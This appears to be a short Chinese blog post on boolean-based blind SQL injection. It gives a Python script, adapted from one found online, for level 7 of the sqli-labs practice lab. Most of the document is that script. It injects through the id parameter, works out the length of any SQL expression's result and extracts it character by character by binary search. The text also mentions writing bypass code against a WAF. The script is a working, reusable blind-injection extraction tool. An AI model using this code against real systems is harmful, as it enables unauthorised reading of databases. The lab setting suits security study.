根据页面的返回值和参数的0和sql语句的or逻辑判断写入的sql语句是否为true。如果有WAF,还需要在参数那里进行修改或写段绕过代码。下面是网上找的脚本,自己稍微做了点修改(sqlilabs第7关),感觉短并且好用。
import requests
def check_res(res):
if "You are in.... Use outfile......" in res.text:
return True
#elif "登录失败" in res.text:
# return False
else:
return False
def res_length(exp):
length = -1
sess = requests.session()
while True:
sql_exp = "length((%s))>%d" % (exp,length)
url = "http://sqli-labs-master/Less-7/?id=0')) or (%s) --+" % (sql_exp)//根据猜测的sql语句进行参数id的闭合
res = sess.get(url)
if not check_res(res):
break
length += 1
return length
def res_result(exp, length):
result = ""
sess = requests.session()
for i in range(length):
left = 0
right = 127
while True:
mid = (left+right) // 2
if mid == left:
result += chr(right)
break
sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
url = "http://sqli-labs-master/Less-7/?id=0')) or (%s) --+" % (sql_exp)
res = sess.get(url)
if check_res(res):
left = mid
else:
right = mid
return result
if __name__ == '__main__':
while True:
exp = input(">>>请输入SQL语句:")
length = res_length(exp)
print("[+]length :%d" % (length))
result = res_result(exp, length)
print("[+]result:%s" % (result))